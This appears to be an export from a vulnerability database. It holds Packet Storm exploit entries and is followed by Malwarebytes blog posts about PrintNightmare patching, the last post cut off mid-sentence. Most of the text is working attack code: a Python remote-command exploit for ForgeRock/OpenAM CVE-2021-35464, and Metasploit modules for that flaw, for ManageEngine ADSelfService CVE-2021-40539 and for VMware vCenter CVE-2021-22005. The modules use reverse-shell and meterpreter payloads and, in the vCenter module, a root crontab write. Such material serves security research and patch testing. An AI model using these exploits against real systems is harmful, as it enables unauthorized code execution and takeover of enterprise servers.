testEndpoint(sURL): \noRequest = urllib.request.Request(sURL) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept: return False \nif oResponse.code == 200: \nif 'ForgeRock' in oResponse.read().decode(errors='ignore'): \nprint('[+] Found potential vulnerable endpoint: ' + sURL) \nreturn True \nreturn False \n \nif testEndpoint(sHost + sEndpoint): return sHost + sEndpoint \nelif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint \nelif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint \nelif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' \nelif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' \nelse: return '' \n \ndef testVuln(oOpener, sURL, sProxy): \noResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(15) ## \"CVE-2021-35464\\n\" should be 15 bytes \ntry: oResponse.readinto(bResp) \nexcept: pass \n#print(bResp.split(b'\\x00')[0]) \nif 'CVE-2021-35464' in bResp.decode(): return True \nelse: return False \n \ndef runVuln(oOpener, sURL, sProxy, sCMD): \noResponse = runCmd(oOpener, sURL, sProxy, sCMD) \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(4096) \ntry: oResponse.readinto(bResp) \nexcept: pass ## The readinto still should have worked \nsResp = bResp.split(b'\\x00')[0].decode() \nprint(sResp) \n \ndef runCmd(oOpener, sURL, sProxy, sCMD): \noData = b'jato.pageSession=' + strSerializedPayload \noHeaders = {'cmd' : sCMD} \noRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \nreturn oOpener.open(oRequest, timeout = iTimeout) \n \ndef main(): \nusage = ( \n'usage: %prog [options] URL \\n' \n'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\\n' \n'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\\n' \n'When in doubt, just enter a single IP address' \n) \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') \n \n## Get or ask for the vars \n(options, args) = parser.parse_args() \n(sHost, sCMD, sProxy) = checkParams(options, args) \n \n## Verify reachability \nprint('[!] Verifying reachability of ' + sHost) \noOpener = urllib.request.build_opener() \noRequest = urllib.request.Request(sHost) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept urllib.error.HTTPError: pass \nexcept: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') \nprint('[+] Endpoint ' + sHost + ' reachable') \n \n## Find endpoint \nprint('[!] Finding correct OpenAM endpoint') \nsEndpoint = findEndpoint(oOpener, sHost, sProxy) \nif sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') \n \n## Verify vulnerability \nif testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') \nelse: sys.exit('[-] Not vulnerable or this implementation does not work') \nif sCMD: \nprint('[+] Running command \"' + sCMD + '\" now:\\n') \nrunVuln(oOpener, sEndpoint, sProxy, sCMD) \nelse: print('[!] All done') \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163525/forgerock1463-exec.txt"}, {"lastseen": "2021-07-13T16:10:40", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "ForgeRock / OpenAM Jato Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163486", "href": "https://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ForgeRock / OpenAM Jato Java Deserialization', \n'Description' => %q{ \nThis module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and \naccess management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s \nimplementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a \nvulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. \n \nThis vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus \nis susceptible to the same issue. \n}, \n'Author' => [ \n'Michael Stepankin', # Original Discovery and PoC \n'bwatters-r7', # Msf module \n'Spencer McIntyre', # All of the Help \n'jheysel-r7' # Check Method \n], \n'References' => [ \n['CVE', '2021-35464'], \n['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'], \n['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244'] \n], \n'DisclosureDate' => '2021-06-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Base path', '/openam']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13)) \n} \n) \nif res.nil? \nCheckCode::Unknown(\"The target server didn't respond!\") \nelsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL') \nCheckCode::Appears \nelse \nCheckCode::Safe \nend \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd_encapsulated = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(\"\\x00\" + ysoserial_payload) \n} \n) \nunless res && res.code == 302 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163486/cve_2021_35464_forgerock_openam.rb.txt"}, {"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. \n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) \nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}], "malwarebytes": [{"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be patched but wasn't. After June's Patch Tuesday, researchers found that the patch did not work in every case, most notably on modern domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that sets that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July's Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don't print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk to attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H1, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803 which is not available yet\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1 Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that disallows users who are not administrators to install only signed print drivers to a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. The updates, patches, and some of the workarounds are all designed to limit the possible executables since they need to be signed printer drivers.\n\nFor a detailed and insightful diagram that shows GPO settings and registry keys administrators can check whether their systems are vulnerable, have a look at this flow chart diagram, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere's a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn't matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nIt is worth mentioning for the users that applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>) that according to 0patch it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft patches that only fix the RCE part of the vulnerability disable the 0patch micropatch which fixes both the LPE and RCE parts of the vulnerability.\n\n> If you're using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn't fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. <https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release a researcher has found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo Delpy shows that the update fails to fix vulnerable systems that use certain settings for a feature called [point and print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft's defense the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency\u2019s (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. \n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he'd found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected 